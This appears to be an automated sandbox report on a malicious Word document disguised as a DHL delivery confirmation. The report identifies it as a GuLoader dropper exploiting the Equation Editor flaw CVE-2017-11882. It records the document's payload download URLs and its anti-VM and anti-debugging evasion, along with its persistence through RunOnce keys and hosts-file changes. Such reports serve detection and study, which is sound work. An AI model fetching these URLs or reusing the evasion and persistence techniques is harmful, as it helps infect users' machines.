Play interactive tour

Edit tour

Analysis Report DHL_ DELIVERY_ PICKUP _CONFIRMATION_CBJ200618092901.doc

Overview

General Information

Sample Name:	DHL_ DELIVERY_ PICKUP _CONFIRMATION_CBJ200618092901.doc
Analysis ID:	358185
MD5:	3564ae31fbd0417674e60e71cb1b0f10
SHA1:	845e9c3d36ded3de8a57c6c81c7318577b851626
SHA256:	fb678c5c0e9dfb294c67907f2d195ab7a5046458e00983e74319b272de7f06b4
Tags:	DHLdoc
Infos:
Most interesting Screenshot:

Detection

GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Droppers Exploiting CVE-2017-11882

Sigma detected: EQNEDT32.EXE connecting to internet

Sigma detected: File Dropped By EQNEDT32EXE

Yara detected GuLoader

Connects to a URL shortener service

Contains functionality to detect hardware virtualization (CPUID execution measurement)

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Drops PE files to the user root directory

Hides threads from debuggers

Modifies the hosts file

Office equation editor drops PE file

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Sigma detected: Executables Started in Suspicious Folder

Sigma detected: Execution in Non-Executable Folder

Sigma detected: Suspicious Program Location Process Starts

Tries to detect Any.run

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Writes to foreign memory regions

Abnormal high CPU Usage

Adds / modifies Windows certificates

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Drops PE files to the user directory

Drops certificate files (DER)

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Office Equation Editor has been started

PE file contains strange resources

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Startup

System is w7x64

WINWORD.EXE (PID: 2368 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)

EQNEDT32.EXE (PID: 1320 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

69577.exe (PID: 2416 cmdline: C:\Users\Public\69577.exe MD5: 8181B7DAAD3D822BE5A16DD3CB6F9065)

RegAsm.exe (PID: 1796 cmdline: C:\Users\Public\69577.exe MD5: 246BB0F8D68A463FD17C235DEB5491C0)

filename1.exe (PID: 2104 cmdline: 'C:\Users\user\subfolder1\filename1.exe' MD5: 8181B7DAAD3D822BE5A16DD3CB6F9065)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000006.00000002.2361430773.0000000000092000.00000040.00000001.sdmp	JoeSecurity_GuLoader	Yara detected GuLoader	Joe Security
Process Memory Space: RegAsm.exe PID: 1796	JoeSecurity_GuLoader	Yara detected GuLoader	Joe Security

Sigma Overview

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882

Show sources

Source: Process started

Author: Florian Roth: Data: Command: C:\Users\Public\69577.exe, CommandLine: C:\Users\Public\69577.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\69577.exe, NewProcessName: C:\Users\Public\69577.exe, OriginalFileName: C:\Users\Public\69577.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1320, ProcessCommandLine: C:\Users\Public\69577.exe, ProcessId: 2416

Sigma detected: EQNEDT32.EXE connecting to internet

Show sources

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 67.199.248.11, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1320, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165

Sigma detected: File Dropped By EQNEDT32EXE

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1320, TargetFilename: C:\Users\Public\69577.exe

Sigma detected: Executables Started in Suspicious Folder

Show sources

Source: Process started

Sigma detected: Execution in Non-Executable Folder

Show sources

Source: Process started

Sigma detected: Suspicious Program Location Process Starts

Show sources

Source: Process started

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\WLjtp[1].txt	ReversingLabs: Detection: 27%
Source: C:\Users\user\subfolder1\filename1.exe	ReversingLabs: Detection: 27%
Source: C:\Users\Public\69577.exe	ReversingLabs: Detection: 27%

Multi AV Scanner detection for submitted file

Show sources

Source: DHL_ DELIVERY_ PICKUP _CONFIRMATION_CBJ200618092901.doc

ReversingLabs: Detection: 22%

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Process created: C:\Users\Public\69577.exe

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Compliance:

Uses new MSVCR Dlls

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Software Vulnerabilities:

Source: global traffic

DNS query: name: bit.ly

Source: global traffic

TCP traffic: 192.168.2.22:49166 -> 5.79.72.163:443

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 67.199.248.11:80

Networking:

Connects to a URL shortener service

Show sources

Source: unknown	DNS query: name: bit.ly
Source: unknown	DNS query: name: bit.ly

Source: Joe Sandbox View	IP Address: 67.199.248.11 67.199.248.11
Source: Joe Sandbox View	IP Address: 67.199.248.11 67.199.248.11
Source: Joe Sandbox View	IP Address: 5.79.72.163 5.79.72.163

Source: Joe Sandbox View

ASN Name: GOOGLE-PRIVATE-CLOUDUS GOOGLE-PRIVATE-CLOUDUS

Source: global traffic

HTTP traffic detected: GET /2NYVK6q HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: bit.lyConnection: Keep-Alive

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{0EAA91A7-30AB-4901-9D2A-3CE504568F55}.tmp

Jump to behavior

Source: global traffic

Source: RegAsm.exe, 00000006.00000002.2362029615.0000000000897000.00000004.00000020.sdmp	String found in binary or memory: /moc.nideknil.wwwwww.linkedin.comj equals www.linkedin.com (Linkedin)
Source: RegAsm.exe, 00000006.00000002.2362029615.0000000000897000.00000004.00000020.sdmp	String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: RegAsm.exe, 00000006.00000002.2362134802.00000000008D2000.00000004.00000020.sdmp	String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Source: unknown

DNS traffic detected: queries for: bit.ly

Source: E0F5C59F9FA661F6F4C50B87FEF3A15A.2.dr	String found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c
Source: RegAsm.exe, 00000006.00000002.2362134802.00000000008D2000.00000004.00000020.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: RegAsm.exe, 00000006.00000002.2362134802.00000000008D2000.00000004.00000020.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: RegAsm.exe, 00000006.00000002.2362134802.00000000008D2000.00000004.00000020.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: RegAsm.exe, 00000006.00000002.2362134802.00000000008D2000.00000004.00000020.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: RegAsm.exe, 00000006.00000002.2362134802.00000000008D2000.00000004.00000020.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: RegAsm.exe, 00000006.00000002.2362134802.00000000008D2000.00000004.00000020.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: RegAsm.exe, 00000006.00000002.2362134802.00000000008D2000.00000004.00000020.sdmp	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: 77EC63BDA74BD0D0E0426DC8F8008506.2.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: RegAsm.exe, 00000006.00000002.2367991308.000000001DB80000.00000004.00000001.sdmp	String found in binary or memory: http://mscrl.micros
Source: RegAsm.exe, 00000006.00000002.2362134802.00000000008D2000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: RegAsm.exe, 00000006.00000002.2362134802.00000000008D2000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: RegAsm.exe, 00000006.00000002.2362134802.00000000008D2000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: RegAsm.exe, 00000006.00000002.2362134802.00000000008D2000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: RegAsm.exe, 00000006.00000002.2362134802.00000000008D2000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: RegAsm.exe, 00000006.00000002.2362134802.00000000008D2000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.digicert.com0:
Source: RegAsm.exe, 00000006.00000002.2362134802.00000000008D2000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: RegAsm.exe, 00000006.00000002.2362134802.00000000008D2000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: RegAsm.exe, 00000006.00000002.2361921486.000000000085D000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.msocsp.com0
Source: RegAsm.exe, 00000006.00000002.2364332174.00000000028D0000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: RegAsm.exe, 00000006.00000002.2364332174.00000000028D0000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: RegAsm.exe, 00000006.00000002.2362134802.00000000008D2000.00000004.00000020.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: RegAsm.exe, 00000006.00000002.2362134802.00000000008D2000.00000004.00000020.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: RegAsm.exe, 00000006.00000002.2362134802.00000000008D2000.00000004.00000020.sdmp	String found in binary or memory: https://1ae2wq.bl.files.1drv.com/
Source: RegAsm.exe, 00000006.00000002.2362134802.00000000008D2000.00000004.00000020.sdmp	String found in binary or memory: https://1ae2wq.bl.files.1drv.com/D
Source: RegAsm.exe, 00000006.00000002.2362134802.00000000008D2000.00000004.00000020.sdmp, RegAsm.exe, 00000006.00000002.2362029615.0000000000897000.00000004.00000020.sdmp	String found in binary or memory: https://1ae2wq.bl.files.1drv.com/y4mF77Blnwr8TsPyz2B-1c6fGLZjEGCG_1HZbGIwXU3xbZegnh_KEVDyUwwuL1T_Nh-
Source: RegAsm.exe, 00000006.00000002.2361986527.000000000087A000.00000004.00000020.sdmp	String found in binary or memory: https://onedrive.live.com/
Source: RegAsm.exe, 00000006.00000002.2362029615.0000000000897000.00000004.00000020.sdmp	String found in binary or memory: https://onedrive.live.com/download?cid=F57CEB019EB26E7D&resid=F57CEB019EB26E7D%21111&authkey=AAYIwGN
Source: RegAsm.exe, 00000006.00000002.2362134802.00000000008D2000.00000004.00000020.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0
Source: 2NYVK6q[1].htm.2.dr	String found in binary or memory: https://u.teknik.io/WLjtp.txt

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49166
Source: unknown	Network traffic detected: HTTP traffic on port 49166 -> 443

E-Banking Fraud:

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A

Jump to dropped file

Spam, unwanted Advertisements and Ransom Demands:

Modifies the hosts file

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

File written: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

System Summary:

Office equation editor drops PE file

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\WLjtp[1].txt			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\69577.exe			Jump to dropped file

Source: C:\Users\Public\69577.exe

Process Stats: CPU usage > 98%

Source: C:\Users\Public\69577.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\Public\69577.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\subfolder1\filename1.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\subfolder1\filename1.exe	Memory allocated: 76D20000 page execute and read and write

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 6_2_00096FFB NtProtectVirtualMemory,
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 6_2_005EB362 NtQuerySystemInformation,
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 6_2_005EB331 NtQuerySystemInformation,

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 6_2_00BA02C8
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 6_2_00BA0CD8
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 6_2_1D7BE920
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 6_2_1D7B0007
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 6_2_1D7BF730
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 6_2_1D7BFA97
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 6_2_1D7BF12C
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 6_2_1D7BF7AC
Source: C:\Users\user\subfolder1\filename1.exe	Code function: 10_2_00409842
Source: C:\Users\user\subfolder1\filename1.exe	Code function: 10_2_00409870
Source: C:\Users\user\subfolder1\filename1.exe	Code function: 10_2_00409815
Source: C:\Users\user\subfolder1\filename1.exe	Code function: 10_2_004098C5
Source: C:\Users\user\subfolder1\filename1.exe	Code function: 10_2_00409892
Source: C:\Users\user\subfolder1\filename1.exe	Code function: 10_2_00409951
Source: C:\Users\user\subfolder1\filename1.exe	Code function: 10_2_00409923
Source: C:\Users\user\subfolder1\filename1.exe	Code function: 10_2_004099D3
Source: C:\Users\user\subfolder1\filename1.exe	Code function: 10_2_004099FA
Source: C:\Users\user\subfolder1\filename1.exe	Code function: 10_2_004099A5
Source: C:\Users\user\subfolder1\filename1.exe	Code function: 10_2_00409A53
Source: C:\Users\user\subfolder1\filename1.exe	Code function: 10_2_00409A22
Source: C:\Users\user\subfolder1\filename1.exe	Code function: 10_2_00409AB0
Source: C:\Users\user\subfolder1\filename1.exe	Code function: 10_2_00409761
Source: C:\Users\user\subfolder1\filename1.exe	Code function: 10_2_00409735
Source: C:\Users\user\subfolder1\filename1.exe	Code function: 10_2_004097EC
Source: C:\Users\user\subfolder1\filename1.exe	Code function: 10_2_004093F5
Source: C:\Users\user\subfolder1\filename1.exe	Code function: 10_2_0040978F
Source: C:\Users\user\subfolder1\filename1.exe	Code function: 10_2_00405935

Source: filename1.exe.6.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: filename1.exe.6.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: filename1.exe.6.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: classification engine

Classification label: mal100.troj.adwa.expl.evad.winDOC@7/21@6/2

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 6_2_005EB1E6 AdjustTokenPrivileges,
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 6_2_005EB1AF AdjustTokenPrivileges,

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$L_ DELIVERY_ PICKUP _CONFIRMATION_CBJ200618092901.doc

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRB24E.tmp

Jump to behavior

Source: C:\Users\Public\69577.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: C:\Users\user\subfolder1\filename1.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: DHL_ DELIVERY_ PICKUP _CONFIRMATION_CBJ200618092901.doc

ReversingLabs: Detection: 22%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown	Process created: C:\Users\Public\69577.exe C:\Users\Public\69577.exe
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe C:\Users\Public\69577.exe
Source: unknown	Process created: C:\Users\user\subfolder1\filename1.exe 'C:\Users\user\subfolder1\filename1.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\69577.exe C:\Users\Public\69577.exe
Source: C:\Users\Public\69577.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe C:\Users\Public\69577.exe

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Source: DHL_ DELIVERY_ PICKUP _CONFIRMATION_CBJ200618092901.doc

Static file information: File size 1410843 > 1048576

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Data Obfuscation:

Yara detected GuLoader

Show sources

Source: Yara match	File source: 00000006.00000002.2361430773.0000000000092000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 1796, type: MEMORY

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 6_2_000938E5 push ds; retf
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 6_2_1E080B4F push ds; retn 0020h
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 6_2_1E080929 push ds; retn 0008h
Source: C:\Users\user\subfolder1\filename1.exe	Code function: 10_2_0040E0BD push ecx; ret
Source: C:\Users\user\subfolder1\filename1.exe	Code function: 10_2_0040ED57 push ds; ret
Source: C:\Users\user\subfolder1\filename1.exe	Code function: 10_2_0040CD22 push ecx; ret
Source: C:\Users\user\subfolder1\filename1.exe	Code function: 10_2_0040B93D push ebx; ret
Source: C:\Users\user\subfolder1\filename1.exe	Code function: 10_2_0040DDC9 push edx; ret
Source: C:\Users\user\subfolder1\filename1.exe	Code function: 10_2_0040D5D9 push ebp; retf
Source: C:\Users\user\subfolder1\filename1.exe	Code function: 10_2_0040D5DB push FFFFFFC3h; ret
Source: C:\Users\user\subfolder1\filename1.exe	Code function: 10_2_0040ED8A push ds; ret
Source: C:\Users\user\subfolder1\filename1.exe	Code function: 10_2_0040CA85 push ecx; ret
Source: C:\Users\user\subfolder1\filename1.exe	Code function: 10_2_0040B383 push esi; ret

Persistence and Installation Behavior:

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\WLjtp[1].txt	Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\69577.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File created: C:\Users\user\subfolder1\filename1.exe	Jump to dropped file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\69577.exe

Jump to dropped file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\WLjtp[1].txt

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\69577.exe

Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce Startup key	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce Startup key	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce Startup key	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce Startup key	Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
